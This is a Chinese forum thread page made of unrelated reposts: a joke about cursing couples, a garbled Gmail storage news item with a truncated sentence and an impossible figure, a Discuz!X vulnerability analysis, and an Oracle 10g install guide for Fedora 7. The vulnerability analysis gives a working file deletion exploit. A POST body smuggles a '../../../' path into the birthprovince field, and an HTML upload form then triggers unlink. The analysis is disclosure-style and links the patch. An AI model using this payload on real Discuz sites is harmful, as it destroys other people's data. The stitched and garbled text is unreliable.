最近看过此主题的会员

返回列表 发帖

七夕了,该干嘛?该诅咒了。

我诅咒过七夕的情侣们,全部都死于非命。
情人节的时候诅咒天下所有情侣,都是失散多年的亲生兄妹。
非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
2、本话题由:小杨发表,本帖发表者小杨符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
3、其他单位或个人使用、转载或引用本帖时必须征得发表者小杨和本站的同意;
4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
6、本站管理员和版主有权不事先通知发帖者而删除本文。

好邪恶的老沙啊。。顶顶

TOP

回复 2# xin0000


    必须的 要邪恶着。

TOP

不解释

TOP

Google官方确认Gmail免费容量增长速度加快
<TABLE class="tab-content table-break" cellSpacing=0 cellPadding=0>



尽管Gmail邮箱的免费容量从2005年4月开始就采用无限+1的自动增长方式,但速度比较慢,现在总容量也没到3GB。再加上Yahoo! Mail今年5月份开始变成无限容量,而微软的Live mail都升级至5GB免费容量了,有相当一部分Gmail用户已经表达了不满,抱怨Google太吝啬了。因为要想


1 本月23号达到4.2GB; 2 明年1月4号将达到6GB; 3 2038年将达到42GB; 4 3456年1月2号将达到2.70266701 × 1072 TB;   虽然3456年的事还太遥远,但Gmail团队刚刚确认了, 已官方加快Gmail免费容量的增长速度。根据我自己的观察,Gmail在从今天早上到现在,似乎增长了一些(不确定,因为没仔细记录数据),速度的确是 加快了(?)。Gmail团队还表示,Google Apps的免费版及教育版里的Gmail邮箱容量,也将和普通免费版Gmail一样,达到同等快的增长速度。 那Google的收费型存储共享计划怎么办?如果你记得,它的价格表原先是这样的:    而现在,变成了这样:    没错,相当于大降价了!同样是20美元一年,原先只可买到6GB额外空间,但现在可买到10GB。这证明了Google仍然会继续它的收费容量销售计划。当然,如果你不急着要这么大的容量,完全可以慢慢等待免费的午餐送上门来。 </TABLE>


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

Discuz!X前台任意文件删除漏洞细节分析

        0x00 概述

<p style="color:#333333;font-family:'Helvetica Neue', Helvetica, Arial, 'Lucida Grande', 'Hiragino Sans GB', 微软雅黑, 'WenQuanYi Micro Hei', STHeiti, SimSun, sans-serif;font-size:14px;background-color:#FFFFFF;">
        9月29日,discuz修复了一个前台任意文件删除的漏洞,相似的漏洞曾在2014年被提交给wooyun和discuz官方,但是修复不完全导致了这次的漏洞。
[/quote]
<p style="color:#333333;font-family:'Helvetica Neue', Helvetica, Arial, 'Lucida Grande', 'Hiragino Sans GB', 微软雅黑, 'WenQuanYi Micro Hei', STHeiti, SimSun, sans-serif;font-size:14px;background-color:#FFFFFF;">
         
[/quote]

        0x01 影响范围

<p style="color:#333333;font-family:'Helvetica Neue', Helvetica, Arial, 'Lucida Grande', 'Hiragino Sans GB', 微软雅黑, 'WenQuanYi Micro Hei', STHeiti, SimSun, sans-serif;font-size:14px;background-color:#FFFFFF;">
        Discuz < 3.4
[/quote]
<p style="color:#333333;font-family:'Helvetica Neue', Helvetica, Arial, 'Lucida Grande', 'Hiragino Sans GB', 微软雅黑, 'WenQuanYi Micro Hei', STHeiti, SimSun, sans-serif;font-size:14px;background-color:#FFFFFF;">
         
[/quote]

        0x02 漏洞重现

<p style="color:#333333;font-family:'Helvetica Neue', Helvetica, Arial, 'Lucida Grande', 'Hiragino Sans GB', 微软雅黑, 'WenQuanYi Micro Hei', STHeiti, SimSun, sans-serif;font-size:14px;background-color:#FFFFFF;">
        环境:win7+phpstudy+discuz3.2
[/quote]
<p style="color:#333333;font-family:'Helvetica Neue', Helvetica, Arial, 'Lucida Grande', 'Hiragino Sans GB', 微软雅黑, 'WenQuanYi Micro Hei', STHeiti, SimSun, sans-serif;font-size:14px;background-color:#FFFFFF;">
        新建importantfile.txt作为测试
[/quote]
<p style="text-align:center;color:#333333;font-family:'Helvetica Neue', Helvetica, Arial, 'Lucida Grande', 'Hiragino Sans GB', 微软雅黑, 'WenQuanYi Micro Hei', STHeiti, SimSun, sans-serif;font-size:14px;background-color:#FFFFFF;">
       
[/quote]
<p style="color:#333333;font-family:'Helvetica Neue', Helvetica, Arial, 'Lucida Grande', 'Hiragino Sans GB', 微软雅黑, 'WenQuanYi Micro Hei', STHeiti, SimSun, sans-serif;font-size:14px;background-color:#FFFFFF;">
        进入设置-个人资料,先在页面源代码找到formhash值
[/quote]
<p style="color:#333333;font-family:'Helvetica Neue', Helvetica, Arial, 'Lucida Grande', 'Hiragino Sans GB', 微软雅黑, 'WenQuanYi Micro Hei', STHeiti, SimSun, sans-serif;font-size:14px;background-color:#FFFFFF;">
http://10.0.2.15:8999/discuz3_2/home.php?mod=spacecp&amp;ac=profile
[/quote]
<p style="text-align:center;color:#333333;font-family:'Helvetica Neue', Helvetica, Arial, 'Lucida Grande', 'Hiragino Sans GB', 微软雅黑, 'WenQuanYi Micro Hei', STHeiti, SimSun, sans-serif;font-size:14px;background-color:#FFFFFF;">
       
[/quote]
<p style="color:#333333;font-family:'Helvetica Neue', Helvetica, Arial, 'Lucida Grande', 'Hiragino Sans GB', 微软雅黑, 'WenQuanYi Micro Hei', STHeiti, SimSun, sans-serif;font-size:14px;background-color:#FFFFFF;">
        可以看到formhash值是b21b6577。
[/quote]
<p style="color:#333333;font-family:'Helvetica Neue', Helvetica, Arial, 'Lucida Grande', 'Hiragino Sans GB', 微软雅黑, 'WenQuanYi Micro Hei', STHeiti, SimSun, sans-serif;font-size:14px;background-color:#FFFFFF;">
        再访问
10.0.2.15:8999/discuz3_2/home.php?mod=spacecp&amp;ac=profile&amp;op=base
[/quote]
<p style="color:#333333;font-family:'Helvetica Neue', Helvetica, Arial, 'Lucida Grande', 'Hiragino Sans GB', 微软雅黑, 'WenQuanYi Micro Hei', STHeiti, SimSun, sans-serif;font-size:14px;background-color:#FFFFFF;">
        Post数据:
birthprovince=../../../importantfile.txt&amp;profilesubmit=1&amp;formhash=b21b6577
[/quote]
<p style="color:#333333;font-family:'Helvetica Neue', Helvetica, Arial, 'Lucida Grande', 'Hiragino Sans GB', 微软雅黑, 'WenQuanYi Micro Hei', STHeiti, SimSun, sans-serif;font-size:14px;background-color:#FFFFFF;">
        如图
[/quote]
<p style="text-align:center;color:#333333;font-family:'Helvetica Neue', Helvetica, Arial, 'Lucida Grande', 'Hiragino Sans GB', 微软雅黑, 'WenQuanYi Micro Hei', STHeiti, SimSun, sans-serif;font-size:14px;background-color:#FFFFFF;">
       
[/quote]
<p style="color:#333333;font-family:'Helvetica Neue', Helvetica, Arial, 'Lucida Grande', 'Hiragino Sans GB', 微软雅黑, 'WenQuanYi Micro Hei', STHeiti, SimSun, sans-serif;font-size:14px;background-color:#FFFFFF;">
        执行后
[/quote]
<p style="text-align:center;color:#333333;font-family:'Helvetica Neue', Helvetica, Arial, 'Lucida Grande', 'Hiragino Sans GB', 微软雅黑, 'WenQuanYi Micro Hei', STHeiti, SimSun, sans-serif;font-size:14px;background-color:#FFFFFF;">
       
[/quote]
<p style="color:#333333;font-family:'Helvetica Neue', Helvetica, Arial, 'Lucida Grande', 'Hiragino Sans GB', 微软雅黑, 'WenQuanYi Micro Hei', STHeiti, SimSun, sans-serif;font-size:14px;background-color:#FFFFFF;">
        出生地被修改成要删除的文件。
[/quote]
<p style="color:#333333;font-family:'Helvetica Neue', Helvetica, Arial, 'Lucida Grande', 'Hiragino Sans GB', 微软雅黑, 'WenQuanYi Micro Hei', STHeiti, SimSun, sans-serif;font-size:14px;background-color:#FFFFFF;">
        最后构造表单执行删除文件
[/quote]
<p style="color:#333333;font-family:'Helvetica Neue', Helvetica, Arial, 'Lucida Grande', 'Hiragino Sans GB', 微软雅黑, 'WenQuanYi Micro Hei', STHeiti, SimSun, sans-serif;font-size:14px;background-color:#FFFFFF;">
<form action=”http://10.0.2.15:8999/discuz3_2/home.php?mod=spacecp&amp;ac=profile&amp;op=base” method=”POST” enctype=”multipart/form-data”>
<input type=”file” name=”birthprovince” id=”file” />
<input type=”text” name=”formhash” value=”b21b6577″/></p>
<input type=”text” name=”profilesubmit” value=”1″/></p>
<input type=”submit” value=”Submit” />
</from>
[/quote]
<p style="color:#333333;font-family:'Helvetica Neue', Helvetica, Arial, 'Lucida Grande', 'Hiragino Sans GB', 微软雅黑, 'WenQuanYi Micro Hei', STHeiti, SimSun, sans-serif;font-size:14px;background-color:#FFFFFF;">
        随便上传一张图片,即可删除importantfile.txt
[/quote]
<p style="text-align:center;color:#333333;font-family:'Helvetica Neue', Helvetica, Arial, 'Lucida Grande', 'Hiragino Sans GB', 微软雅黑, 'WenQuanYi Micro Hei', STHeiti, SimSun, sans-serif;font-size:14px;background-color:#FFFFFF;">
       
[/quote]
<p style="color:#333333;font-family:'Helvetica Neue', Helvetica, Arial, 'Lucida Grande', 'Hiragino Sans GB', 微软雅黑, 'WenQuanYi Micro Hei', STHeiti, SimSun, sans-serif;font-size:14px;background-color:#FFFFFF;">
        成功删除importantfile.txt,重现成功!
[/quote]
<p style="color:#333333;font-family:'Helvetica Neue', Helvetica, Arial, 'Lucida Grande', 'Hiragino Sans GB', 微软雅黑, 'WenQuanYi Micro Hei', STHeiti, SimSun, sans-serif;font-size:14px;background-color:#FFFFFF;">
         
[/quote]

        0x03 修复方案

<p style="color:#333333;font-family:'Helvetica Neue', Helvetica, Arial, 'Lucida Grande', 'Hiragino Sans GB', 微软雅黑, 'WenQuanYi Micro Hei', STHeiti, SimSun, sans-serif;font-size:14px;background-color:#FFFFFF;">
        https://gitee.com/ComsenzDiscuz/DiscuzX/commit/7d603a197c2717ef1d7e9ba654cf72aa42d3e574
[/quote]
<p style="color:#333333;font-family:'Helvetica Neue', Helvetica, Arial, 'Lucida Grande', 'Hiragino Sans GB', 微软雅黑, 'WenQuanYi Micro Hei', STHeiti, SimSun, sans-serif;font-size:14px;background-color:#FFFFFF;">
        删除unlink相关代码。
[/quote]
<p style="color:#333333;font-family:'Helvetica Neue', Helvetica, Arial, 'Lucida Grande', 'Hiragino Sans GB', 微软雅黑, 'WenQuanYi Micro Hei', STHeiti, SimSun, sans-serif;font-size:14px;background-color:#FFFFFF;">
         
[/quote]

        0x04 漏洞分析

<p style="color:#333333;font-family:'Helvetica Neue', Helvetica, Arial, 'Lucida Grande', 'Hiragino Sans GB', 微软雅黑, 'WenQuanYi Micro Hei', STHeiti, SimSun, sans-serif;font-size:14px;background-color:#FFFFFF;">
        根据补丁,漏洞存在于upload/source/include/spacecp/spacecp_profile.php。
[/quote]
<p style="color:#333333;font-family:'Helvetica Neue', Helvetica, Arial, 'Lucida Grande', 'Hiragino Sans GB', 微软雅黑, 'WenQuanYi Micro Hei', STHeiti, SimSun, sans-serif;font-size:14px;background-color:#FFFFFF;">
        先看第70行
[/quote]
<p style="color:#333333;font-family:'Helvetica Neue', Helvetica, Arial, 'Lucida Grande', 'Hiragino Sans GB', 微软雅黑, 'WenQuanYi Micro Hei', STHeiti, SimSun, sans-serif;font-size:14px;background-color:#FFFFFF;">
if(submitcheck(‘profilesubmit’)) {
[/quote]
<p style="color:#333333;font-family:'Helvetica Neue', Helvetica, Arial, 'Lucida Grande', 'Hiragino Sans GB', 微软雅黑, 'WenQuanYi Micro Hei', STHeiti, SimSun, sans-serif;font-size:14px;background-color:#FFFFFF;">
        提交1进入这个判断。
[/quote]
<p style="color:#333333;font-family:'Helvetica Neue', Helvetica, Arial, 'Lucida Grande', 'Hiragino Sans GB', 微软雅黑, 'WenQuanYi Micro Hei', STHeiti, SimSun, sans-serif;font-size:14px;background-color:#FFFFFF;">
        来到220行,补丁前:
[/quote]
<p style="text-align:center;color:#333333;font-family:'Helvetica Neue', Helvetica, Arial, 'Lucida Grande', 'Hiragino Sans GB', 微软雅黑, 'WenQuanYi Micro Hei', STHeiti, SimSun, sans-serif;font-size:14px;background-color:#FFFFFF;">
       
[/quote]
<p style="color:#333333;font-family:'Helvetica Neue', Helvetica, Arial, 'Lucida Grande', 'Hiragino Sans GB', 微软雅黑, 'WenQuanYi Micro Hei', STHeiti, SimSun, sans-serif;font-size:14px;background-color:#FFFFFF;">
        往上看来到:
[/quote]
<p style="text-align:center;color:#333333;font-family:'Helvetica Neue', Helvetica, Arial, 'Lucida Grande', 'Hiragino Sans GB', 微软雅黑, 'WenQuanYi Micro Hei', STHeiti, SimSun, sans-serif;font-size:14px;background-color:#FFFFFF;">
       
[/quote]
<p style="color:#333333;font-family:'Helvetica Neue', Helvetica, Arial, 'Lucida Grande', 'Hiragino Sans GB', 微软雅黑, 'WenQuanYi Micro Hei', STHeiti, SimSun, sans-serif;font-size:14px;background-color:#FFFFFF;">
        可以看出文件上传成功就可以进入228行的unlink从而删除指定文件。
[/quote]
<p style="color:#333333;font-family:'Helvetica Neue', Helvetica, Arial, 'Lucida Grande', 'Hiragino Sans GB', 微软雅黑, 'WenQuanYi Micro Hei', STHeiti, SimSun, sans-serif;font-size:14px;background-color:#FFFFFF;">
        现在就看如何控制指定文件,也就是控制$space[$key]这个变量。
[/quote]
<p style="color:#333333;font-family:'Helvetica Neue', Helvetica, Arial, 'Lucida Grande', 'Hiragino Sans GB', 微软雅黑, 'WenQuanYi Micro Hei', STHeiti, SimSun, sans-serif;font-size:14px;background-color:#FFFFFF;">
        继续往上看来到:
[/quote]
<p style="text-align:center;color:#333333;font-family:'Helvetica Neue', Helvetica, Arial, 'Lucida Grande', 'Hiragino Sans GB', 微软雅黑, 'WenQuanYi Micro Hei', STHeiti, SimSun, sans-serif;font-size:14px;background-color:#FFFFFF;">
       
[/quote]
<p style="color:#333333;font-family:'Helvetica Neue', Helvetica, Arial, 'Lucida Grande', 'Hiragino Sans GB', 微软雅黑, 'WenQuanYi Micro Hei', STHeiti, SimSun, sans-serif;font-size:14px;background-color:#FFFFFF;">
        可以看出space存用户资料,就可以利用space[birthprovince]存要删除的文件。
[/quote]
<p style="color:#333333;font-family:'Helvetica Neue', Helvetica, Arial, 'Lucida Grande', 'Hiragino Sans GB', 微软雅黑, 'WenQuanYi Micro Hei', STHeiti, SimSun, sans-serif;font-size:14px;background-color:#FFFFFF;">
        那如何修改birthprovince为指定文件呢,直接post提交就绕过限制了。
[/quote]
<p style="color:#333333;font-family:'Helvetica Neue', Helvetica, Arial, 'Lucida Grande', 'Hiragino Sans GB', 微软雅黑, 'WenQuanYi Micro Hei', STHeiti, SimSun, sans-serif;font-size:14px;background-color:#FFFFFF;">
        总结整个漏洞利用流程:
修改birthprovince->上传图片->执行unlink->删除任意文件
[/quote]
<p style="color:#333333;font-family:'Helvetica Neue', Helvetica, Arial, 'Lucida Grande', 'Hiragino Sans GB', 微软雅黑, 'WenQuanYi Micro Hei', STHeiti, SimSun, sans-serif;font-size:14px;background-color:#FFFFFF;">
         
[/quote]

        0x05 结语

<p style="color:#333333;font-family:'Helvetica Neue', Helvetica, Arial, 'Lucida Grande', 'Hiragino Sans GB', 微软雅黑, 'WenQuanYi Micro Hei', STHeiti, SimSun, sans-serif;font-size:14px;background-color:#FFFFFF;">
        删文件……,大家不要乱搞,该补的赶紧补,discuz树大招风,2014的补丁又不补完全,正是这样攻与防的不断博弈,使安全界生机勃勃,妙趣横生,也使互联网愈发安全稳固。
[/quote]


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

如何安装oracle 10g 到Fedora 7中
上次回国时掏了几十大洋买了本oracle9i的书,本打算在这个新公司好好学习的。谁知新公司的oracle有人专门负责,就提不起多少兴趣学这个东西了。前两天无意中翻到这本书,想想自已已有好久没有买过这么贵的书了,丢在这里不用多可惜啊?况且如今人民币升值越来越快,股市又大跌,口袋里的钱是越来越少,不择机找个更好的工作,以后的日子就越来越难了。何不趁目前很闲的时候充充电呢?心动不如行动,装个Oracle玩玩吧!但目前公司的用的是oracle10.2g的版本,负责oracle的老大也推荐学oracle10g。反正之前也搞了好长一段时间oracle9i,DBA方面的知识也略懂一二,就装个10吧!这本书的内容也许也用得上。
1.加以下的内容到文件/etc/sysctl.conf
ernel.shmall = 2097152
kernel.shmmax = 2147483648
kernel.shmmni = 4096
# semaphores: semmsl, semmns, semopm, semmni
kernel.sem = 250 32000 100 128
fs.file-max = 65536
net.ipv4.ip_local_port_range = 1024 65000
net.core.rmem_default=262144
net.core.rmem_max=262144
net.core.wmem_default=262144
net.core.wmem_max=262144
2.加入下面的内容到/etc/security/limits.conf
* soft nproc 2047
* hard nproc 16384
* soft nofile 1024
* soft nofile 65536
3.加下面一行到/etc/pam.d/login
session required /lib/security/pam_limits.so
4.屏蔽SELINUX在/etc/selinux/config中
SELINUX=disabled
5.加入以下文件包
yum -y install libXp libaio
yum -y install compat-libstde++* compat-libf2c* compat-gcc* compat-libgcc*
注意:如果不安装这些包,将会显示错误信息
”/tmp/OraInstall2005-07-07_09-40-45AM/jre/1.4.2/lib/i386/libawt.so: libXp.so.6: cannot open shared object file: No such file or directory occurred..” 6.建立用户和组
groupadd oinstall
groupadd dba
useradd -g oinstall -G dba oracle
passwd oracle #设置用户oracle的密码
7.建立目录并赋权给用户oracle
mkdir -p /u01/app/oracle/product/10.2.0/db_1
chown -R oracle.oinstall /u01
8.修改文件/etc/redhat-rlease
redhat - 4 #因为oracle安装时会检测系统版本,fedora未列在内
9.加入以下的内容到oracle的home目录 下的文件.bash_profile中
# Oracle SettingsTMP=/tmp; export TMPTMPDIR=$TMP; export TMPDIRORACLE_BASE=/u01/app/oracle; export ORACLE_BASEORACLE_HOME=$ORACLE_BASE/product/10.2.0/db_1; export ORACLE_HOMEORACLE_SID=TSH1; export ORACLE_SIDORACLE_TERM=xterm; export ORACLE_TERMPATH=/usr/sbin:$PATH; export PATHPATH=$ORACLE_HOME/bin:$PATH; export PATHLD_LIBRARY_PATH=$ORACLE_HOME/lib:/lib:/usr/lib; export LD_LIBRARY_PATHCLASSPATH=$ORACLE_HOME/jre:$ORACLE_HOME/jlib:$ORACLE_HOME/rdbms/jlib; export CLASSPATHif [ $USER = "oracle" ]; thenif [ $SHELL = "/bin/ksh" ]; thenulimit -p 16384ulimit -n 65536elseulimit -u 16384 -n 65536fifi
10. 拷贝oracle安装文件到/home/oracle下,解压缩
unzip 10201_database_linux32.zip
11.重新启动电脑,运行以下命令
xhost + #开始我没运行,不能出现oracle的安装画面
12.开始安装oralce
./runInstaller
之后一切顺利。至于怎样使用以后再述。


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

返回列表